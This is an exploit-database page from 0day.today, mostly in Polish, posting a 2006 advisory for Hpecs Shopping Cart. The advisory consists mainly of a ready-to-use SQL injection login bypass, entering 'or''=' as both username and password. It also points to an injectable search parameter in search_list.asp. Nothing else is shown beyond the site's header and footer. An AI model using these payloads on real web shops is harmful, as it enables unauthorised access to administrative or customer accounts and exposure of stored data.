[ autoryzacja ] [ rejestracja ] [ odzyskaj konto ]
Skontaktuj się
Możesz się z nami skonaktować przez:
0day Today  Market Exploitów i Baza Exploitów 0day

Hpecs Shopping Cart Remote Login Bypass Vulnerability

Autor
Security Access Point
Ryzyko
[
Nieskategoryzowane Zagrożenie Bezpieczeństwa
]
0day-ID
0day-ID-1167
Kategoria
web applications
Data dodania
14-11-2006
Platforma
unsorted
=====================================================
Hpecs Shopping Cart Remote Login Bypass Vulnerability
=====================================================



vendor site:http://hpe.net/
product:hpecs shopping cart
bug:injection sql
risk:high


login bypass :
username:     'or''='
passwd:       'or''='

injection sql (post) :

http://site.com/search_list.asp
variables:
Hpecs_Find=maingroup&searchstring='[sql]
 ( or just post your query in the search engine ... )




#  0day.today [2024-07-04]  #